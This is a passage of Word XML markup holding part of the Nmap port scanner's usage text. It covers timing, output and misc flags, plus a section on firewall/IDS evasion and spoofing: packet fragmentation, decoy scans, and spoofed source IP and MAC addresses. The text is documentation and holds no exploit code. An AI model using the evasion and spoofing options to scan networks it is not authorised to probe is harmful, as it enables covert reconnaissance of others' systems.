        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  --min-hostgroup/max-hostgroup &lt;size&gt;: Parallel host scan group sizes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1E8B54" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --min-parallelism/max-parallelism &lt;numprobes&gt;: Probe parallelization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD40023" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout &lt;time&gt;: Specifies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62162AD6" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      probe round trip time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077631C8" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --max-retries &lt;tries&gt;: Caps number of port scan probe retransmissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C60778F" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --host-timeout &lt;time&gt;: Give up on target after this long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD781BC" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --scan-delay/--max-scan-delay &lt;time&gt;: Adjust delay between probes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159912DE" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --min-rate &lt;number&gt;: Send packets no slower than &lt;number&gt; per second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C759502" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --max-rate &lt;number&gt;: Send packets no faster than &lt;number&gt; per second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E236B5" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FIREWALL/IDS EVASION AND SPOOFING:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42599472" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -f; --mtu &lt;val&gt;: fragment packets (optionally w/given MTU)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A0B954" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -D &lt;decoy1,decoy2[,ME],...&gt;: Cloak a scan with decoys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF26BD0" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -S &lt;IP_Address&gt;: Spoof source address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281EC90E" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -e &lt;iface&gt;: Use specified interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4013EFCC" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -g/--source-port &lt;portnum&gt;: Use given port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E32ECD" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --proxies &lt;url1,[url2],...&gt;: Relay connections through HTTP/SOCKS4 proxies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41874DC8" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --data &lt;hex string&gt;: Append a custom payload to sent packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBFCD4A" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --data-string &lt;string&gt;: Append a custom ASCII string to sent packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3395B5" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --data-length &lt;num&gt;: Append random data to sent packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1903041E" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --ip-options &lt;options&gt;: Send packets with specified ip options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C1B1B1" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --ttl &lt;val&gt;: Set IP time-to-live field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CA8F04" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --spoof-mac &lt;mac address/prefix/vendor name&gt;: Spoof your MAC address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDD83BD" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --badsum: Send packets with a bogus TCP/UDP/SCTP checksum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6613CA17" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203CCBDE" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -oN/-oX/-oS/-oG &lt;file&gt;: Output scan in normal, XML, s|&lt;rIpt kIddi3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5765D29F" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     and Grepable format, respectively, to the given filename.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784E08D5" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -oA &lt;basename&gt;: Output in the three major formats at once</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B5C2DF" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -v: Increase verbosity level (use -vv or more for greater effect)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C01C9A4" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d: Increase debugging level (use -dd or more for greater effect)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA1703E" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --reason: Display the reason a port is in a particular state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5BE84B" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --open: Only show open (or possibly open) ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEB630E" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --packet-trace: Show all packets sent and received</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3443F9D0" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --iflist: Print host interfaces and routes (for debugging)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED35F6E" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --append-output: Append to rather than clobber specified output files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E00C1A5" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --resume &lt;filename&gt;: Resume an aborted scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E11CA1A" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --stylesheet &lt;path/URL&gt;: XSL stylesheet to transform XML output to HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B834EB2" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --webxml: Reference stylesheet from Nmap.Org for more portable XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476EB0E5" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --no-stylesheet: Prevent associating of XSL stylesheet w/XML output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C851DCD" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MISC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D52ECC" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -6: Enable IPv6 scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2270FC30" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -A: Enable OS detection, version detection, script scanning, and traceroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63877A21" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --datadir &lt;dirname&gt;: Specify custom Nmap data file location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6522C5" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --send-eth/--send-ip: Send using raw ethernet frames or IP packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F3D727" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
